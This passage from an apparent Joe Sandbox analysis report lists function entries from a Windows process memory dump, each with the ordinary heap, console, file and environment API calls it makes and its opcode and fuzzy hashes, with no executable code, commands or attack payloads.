                                                      • Instruction Fuzzy Hash: A231C032615BC28AEB60DF21E8417F9B7A4FB88B88F848136EA4D47B54CF38D245C710
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: CaptureContextEntryFunctionLookupUnwindVirtual__raise_securityfailure
                                                      • String ID:
                                                      • API String ID: 140117192-0
                                                      • Opcode ID: f9503a7e6f26e693eab0e8ec34dcabcd79a91a5ad0fdcc229cb5dec8ce22a0f7
                                                      • Instruction ID: 83bc1b35d196cbaa29b8837324daef3cc31710991912e68987bfb88e021a2f78
                                                      • Opcode Fuzzy Hash: f9503a7e6f26e693eab0e8ec34dcabcd79a91a5ad0fdcc229cb5dec8ce22a0f7
                                                      • Instruction Fuzzy Hash: ED41E635A08F0281EB58EB08F882365B3A4FB88755FD09137DA8D86764DFBDE454C721
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: wcstol$lstrcmp
                                                      • String ID:
                                                      • API String ID: 3515581199-0
                                                      • Opcode ID: 5b9efed5608bd49f2816daba6a3b85e90b3500fb38e55be3423670eddfbfd6ec
                                                      • Instruction ID: 1f1bc9820bcd32f17831dbf875035cf3b4da619a652d768192505653d1addbe7
                                                      • Opcode Fuzzy Hash: 5b9efed5608bd49f2816daba6a3b85e90b3500fb38e55be3423670eddfbfd6ec
                                                      • Instruction Fuzzy Hash: 5C210532A1C64283E760EB399095639EBA0FB49740F82543ADB4F02654CFFCF490C361
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: File_get_osfhandle$TimeWrite
                                                      • String ID:
                                                      • API String ID: 4019809305-0
                                                      • Opcode ID: 81587e0329514d19275e074575feb35963da2dd15ba7483d0e323a7e2a39d08e
                                                      • Instruction ID: 494311eddd180b83f490c7cba38419efac7d7158260a26952058fcb188cf9ae8
                                                      • Opcode Fuzzy Hash: 81587e0329514d19275e074575feb35963da2dd15ba7483d0e323a7e2a39d08e
                                                      • Instruction Fuzzy Hash: 3931C422A0878286E794EB14948633DF790FF49BA0F85A33AD94E437D5CFBCE4558712
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: memset$DriveNamePathTypeVolume
                                                      • String ID:
                                                      • API String ID: 1029679093-0
                                                      • Opcode ID: 98c11749b4d10f39a46d47e0adf4f6b8e1502341a23e0233d90f7bb3d593d270
                                                      • Instruction ID: d39c0115cf8cafc962e48f59f97dc0ef2501ea764abbde70a4259f2ecc56c814
                                                      • Opcode Fuzzy Hash: 98c11749b4d10f39a46d47e0adf4f6b8e1502341a23e0233d90f7bb3d593d270
                                                      • Instruction Fuzzy Hash: 73315A32B05A818AEB24DF21D8563E8A7A0FB89B85F848136CA4D8BB44DF7CD645C711
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: File$DeleteErrorLastWrite_get_osfhandle
                                                      • String ID:
                                                      • API String ID: 2448200120-0
                                                      • Opcode ID: 8b4da8a10e097a17451e285642832c13025bfbcfcba5fc9726ddc1af043f7f21
                                                      • Instruction ID: 5f3b791abb8b9e46b96c73d998ed739eccc0b42f2d47152f2f3ade92c81db239
                                                      • Opcode Fuzzy Hash: 8b4da8a10e097a17451e285642832c13025bfbcfcba5fc9726ddc1af043f7f21
                                                      • Instruction Fuzzy Hash: 83214C31E08B4697E714FB11A402379F6A1FBC8B81F85423AD90E47794CFBCE4118B22
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: Heap$AllocProcess
                                                      • String ID:
                                                      • API String ID: 1617791916-0
                                                      • Opcode ID: 42f91e47f3ef5671c9468e2150952d512ccb49b47a4aa8ec2999c576e9d14cb8
                                                      • Instruction ID: 3b49d2bb69e0262cf8224318908c21b29e493a0c8cd54ef8c8a020a4741fe170
                                                      • Opcode Fuzzy Hash: 42f91e47f3ef5671c9468e2150952d512ccb49b47a4aa8ec2999c576e9d14cb8
                                                      • Instruction Fuzzy Hash: D621F461A08B42C2EF04EB15A901179F7A1FF89BE1B959632DE1E03395DF7CE0018361
                                                      APIs
                                                        • Part of subcall function 00007FF7E1DC3C24: GetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF7E1DC3D0C
                                                        • Part of subcall function 00007FF7E1DC3C24: towupper.MSVCRT ref: 00007FF7E1DC3D2F
                                                        • Part of subcall function 00007FF7E1DC3C24: iswalpha.MSVCRT ref: 00007FF7E1DC3D4F
                                                        • Part of subcall function 00007FF7E1DC3C24: towupper.MSVCRT ref: 00007FF7E1DC3D75
                                                        • Part of subcall function 00007FF7E1DC3C24: GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7E1DC3DBF
                                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7E1DDEA0F,?,?,?,00007FF7E1DDE925,?,?,?,?,00007FF7E1DBB9B1), ref: 00007FF7E1DB6ABF
                                                      • RtlFreeHeap.NTDLL ref: 00007FF7E1DB6AD3
                                                        • Part of subcall function 00007FF7E1DB6B84: SetEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,00007FF7E1DB6AE8,?,?,?,00007FF7E1DDEA0F,?,?,?,00007FF7E1DDE925), ref: 00007FF7E1DB6B8B
                                                        • Part of subcall function 00007FF7E1DB6B84: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,?,00007FF7E1DB6AE8,?,?,?,00007FF7E1DDEA0F,?,?,?,00007FF7E1DDE925), ref: 00007FF7E1DB6B97
                                                        • Part of subcall function 00007FF7E1DB6B84: RtlFreeHeap.NTDLL ref: 00007FF7E1DB6BAF
                                                        • Part of subcall function 00007FF7E1DB6B30: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7E1DB6AF1,?,?,?,00007FF7E1DDEA0F,?,?,?,00007FF7E1DDE925), ref: 00007FF7E1DB6B39
                                                        • Part of subcall function 00007FF7E1DB6B30: RtlFreeHeap.NTDLL ref: 00007FF7E1DB6B4D
                                                        • Part of subcall function 00007FF7E1DB6B30: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7E1DB6AF1,?,?,?,00007FF7E1DDEA0F,?,?,?,00007FF7E1DDE925), ref: 00007FF7E1DB6B59
                                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7E1DDEA0F,?,?,?,00007FF7E1DDE925,?,?,?,?,00007FF7E1DBB9B1), ref: 00007FF7E1DB6B03
                                                      • RtlFreeHeap.NTDLL ref: 00007FF7E1DB6B17
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                      • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmp
                                                      • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: Heap$Process$Free$towupper$CurrentDirectoryEnvironmentFullNamePathStringsiswalpha
                                                      • String ID:
                                                      • API String ID: 3512109576-0
                                                      • Opcode ID: bc717c9a596d532be53730772a57c2b9eba5803a0bc99b3bfc1eed86634cc025
                                                      • Instruction ID: 17d18de5e14ca10350adfa32aa2996a0f90b2cd1ac54c7dd49fc07f285246e8a
                                                      • Opcode Fuzzy Hash: bc717c9a596d532be53730772a57c2b9eba5803a0bc99b3bfc1eed86634cc025
                                                      • Instruction Fuzzy Hash: 8D21BF62A08A8295EF05FF2594023B8BBA0EB59B45F988033C91E83351DF7C9445C372
                                                      APIs
                                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7E1DBAF82), ref: 00007FF7E1DBB6D0
                                                      • HeapReAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7E1DBAF82), ref: 00007FF7E1DBB6E7
                                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7E1DBAF82), ref: 00007FF7E1DBB701
                                                      • HeapSize.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7E1DBAF82), ref: 00007FF7E1DBB715
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                       • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: Heap$Process$AllocSize
                                                      • String ID:
                                                      • API String ID: 2549470565-0
                                                      • Opcode ID: 11430d80cb485e7b9ceb592bfe559dc550d55c3bb95ca86021ccd698df5acc4f
                                                      • Instruction ID: 571ec14e998341a004c35bb6ac4a439367390e3f58948ef0e1355a89bf5dbd93
                                                      • Opcode Fuzzy Hash: 11430d80cb485e7b9ceb592bfe559dc550d55c3bb95ca86021ccd698df5acc4f
                                                      • Instruction Fuzzy Hash: 46213062A09786A6EF15EB11E441678F6A1FB89B80BDC9432DA0F03754DFBCE941C721
                                                      APIs
                                                      • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00007FF7E1DC507A), ref: 00007FF7E1DDD01C
                                                      • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00007FF7E1DC507A), ref: 00007FF7E1DDD033
                                                      • FillConsoleOutputAttribute.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00007FF7E1DC507A), ref: 00007FF7E1DDD06D
                                                      • SetConsoleTextAttribute.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,?,?,?,?,?,?,00000000,00007FF7E1DC507A), ref: 00007FF7E1DDD07F
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                       • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: Console$Attribute$BufferFillHandleInfoOutputScreenText
                                                      • String ID:
                                                      • API String ID: 1033415088-0
                                                      • Opcode ID: 45059cb2ee047cb232d20320cf03883d9ebc73042b8c9a2b0d276472751f5675
                                                      • Instruction ID: 5ad64a764c7d74ff8db13a4b38af0831a795334048b46bb5c34826f0268bae33
                                                      • Opcode Fuzzy Hash: 45059cb2ee047cb232d20320cf03883d9ebc73042b8c9a2b0d276472751f5675
                                                      • Instruction Fuzzy Hash: EE118631618A5287DB44EB10F05527AF7A0FB8EB95F845136EA8E47B94DF7CD0458B10
                                                      APIs
                                                        • Part of subcall function 00007FF7E1DC1EA0: wcschr.MSVCRT(?,?,?,00007FF7E1DB286E,00000000,00000000,00000000,00000000,00000000,0000000A,?,00007FF7E1DE0D54), ref: 00007FF7E1DC1EB3
                                                      • CreateFileW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7E1DB5A2E
                                                      • _open_osfhandle.MSVCRT ref: 00007FF7E1DB5A4F
                                                      • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,00000000,00008000,?,00000001,00007FF7E1DB260D), ref: 00007FF7E1DD37AA
                                                      • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0 ref: 00007FF7E1DD37D2
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                       • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: CloseCreateErrorFileHandleLast_open_osfhandlewcschr
                                                      • String ID:
                                                      • API String ID: 22757656-0
                                                      • Opcode ID: 6f2d595de901b4657c2270727e019009ca61754dc2b8e6e3406c67fcea3533dc
                                                      • Instruction ID: 61744d3f2ad8b46befc6766ce7b50e69c15f729ef14ca400901f7f53588df6c8
                                                      • Opcode Fuzzy Hash: 6f2d595de901b4657c2270727e019009ca61754dc2b8e6e3406c67fcea3533dc
                                                      • Instruction Fuzzy Hash: EA11E772A0464597E710EB24E44933DBAA0FB8AB75FA48335D62E473D0CF7CD4498B10
                                                      APIs
                                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000028,00007FF7E1DD5433,?,?,?,00007FF7E1DD69B8,?,?,?,?,?,00007FF7E1DC8C39), ref: 00007FF7E1DD56C5
                                                      • RtlFreeHeap.NTDLL ref: 00007FF7E1DD56D9
                                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000028,00007FF7E1DD5433,?,?,?,00007FF7E1DD69B8,?,?,?,?,?,00007FF7E1DC8C39), ref: 00007FF7E1DD56FD
                                                      • RtlFreeHeap.NTDLL ref: 00007FF7E1DD5711
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                       • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: Heap$FreeProcess
                                                      • String ID:
                                                      • API String ID: 3859560861-0
                                                      • Opcode ID: 3558426be91c37f0606525c683e3d483ead9a8c3dc25e426f1ffeaf0c5774795
                                                      • Instruction ID: cc9ee712fcb45e9e591c36c146fc6c95fb86678877c0b0cef4b1eb6d2d983d9a
                                                      • Opcode Fuzzy Hash: 3558426be91c37f0606525c683e3d483ead9a8c3dc25e426f1ffeaf0c5774795
                                                      • Instruction Fuzzy Hash: 50112572A04B81D6EB04AF56E4041A8BBB0FB89F85B988136DB4E03718DF38E456C750
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                       • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: CaptureContextEntryFunctionLookupUnwindVirtual__raise_securityfailure
                                                      • String ID:
                                                      • API String ID: 140117192-0
                                                      • Opcode ID: c08ae526ada62f987d461bd82afd9432e1c3bf21ef9f50b7bdd1a09949af37b2
                                                      • Instruction ID: 1165895eceb500f55a2466649f1fcbf9f09c337d1f6e99fdc8cd38e38157d823
                                                      • Opcode Fuzzy Hash: c08ae526ada62f987d461bd82afd9432e1c3bf21ef9f50b7bdd1a09949af37b2
                                                      • Instruction Fuzzy Hash: F621D435D08F4285E748EB04F882369B3A4FB88B55F909136EA8D87B64DFBDE444C721
                                                      APIs
                                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7E1DB8798), ref: 00007FF7E1DC4AD6
                                                      • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7E1DB8798), ref: 00007FF7E1DC4AEF
                                                        • Part of subcall function 00007FF7E1DC4A14: GetEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000000,00007FF7E1DC49F1), ref: 00007FF7E1DC4A28
                                                        • Part of subcall function 00007FF7E1DC4A14: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7E1DC49F1), ref: 00007FF7E1DC4A66
                                                        • Part of subcall function 00007FF7E1DC4A14: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7E1DC49F1), ref: 00007FF7E1DC4A7D
                                                        • Part of subcall function 00007FF7E1DC4A14: memmove.MSVCRT(?,?,00000000,00007FF7E1DC49F1), ref: 00007FF7E1DC4A9A
                                                        • Part of subcall function 00007FF7E1DC4A14: FreeEnvironmentStringsW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,?,00000000,00007FF7E1DC49F1), ref: 00007FF7E1DC4AA2
                                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7E1DB8798), ref: 00007FF7E1DCEE64
                                                      • RtlFreeHeap.NTDLL ref: 00007FF7E1DCEE78
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                       • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: Heap$Process$AllocEnvironmentFreeStrings$memmove
                                                      • String ID:
                                                      • API String ID: 2759988882-0
                                                      • Opcode ID: 7a5c712774281da9825380d2707369d566eac4a7ff1e30a642231065effaaf4a
                                                      • Instruction ID: 567964930ba76a32a938d1862c05fe4f1771baacec405612afa27c4989fefbf7
                                                      • Opcode Fuzzy Hash: 7a5c712774281da9825380d2707369d566eac4a7ff1e30a642231065effaaf4a
                                                      • Instruction Fuzzy Hash: B4F04F60F05B42D6EF09FB659406278EDD1FF8EB42B88C475CD0E82350EE7CA4048722
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.1698063727.00007FF7E1DB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7E1DB0000, based on PE: true
                                                       • Associated: 00000003.00000002.1698043555.00007FF7E1DB0000.00000002.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000003.00000002.1698099153.00007FF7E1DE2000.00000002.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000003.00000002.1698118140.00007FF7E1DED000.00000004.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000003.00000002.1698118140.00007FF7E1DF1000.00000004.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000003.00000002.1698118140.00007FF7E1DFF000.00000004.00000001.01000000.00000004.sdmp
                                                       • Associated: 00000003.00000002.1698197724.00007FF7E1E09000.00000002.00000001.01000000.00000004.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_7ff7e1db0000_alpha.jbxd
                                                      Similarity
                                                      • API ID: ConsoleMode_get_osfhandle
                                                      • String ID:
                                                      • API String ID: 1606018815-0
                                                      • Opcode ID: 422b38324ae02b1855cf7ad64e97296a8d78d568ed733181d0d72e350d9743d9
                                                      • Instruction ID: 30f8c1e0b5b06d5ad0a2cf184225881abd714b78e80bb3611b4bd5cb7713cf61
                                                      • Opcode Fuzzy Hash: 422b38324ae02b1855cf7ad64e97296a8d78d568ed733181d0d72e350d9743d9
                                                      • Instruction Fuzzy Hash: D8F01C36A24A42DBD708AB11E445279FA60FB8AB03F84A275DA0B42394DF7CD0098B11
                                                      APIs
                                                        • Part of subcall function 00007FF7E1DBCD90: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7E1DBB9A1,?,?,?,?,00007FF7E1DBD81A), ref: 00007FF7E1DBCDA6
                                                        • Part of subcall function 00007FF7E1DBCD90: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF7E1DBB9A1,?,?,?,?,00007FF7E1DBD81A), ref: 00007FF7E1DBCDBD
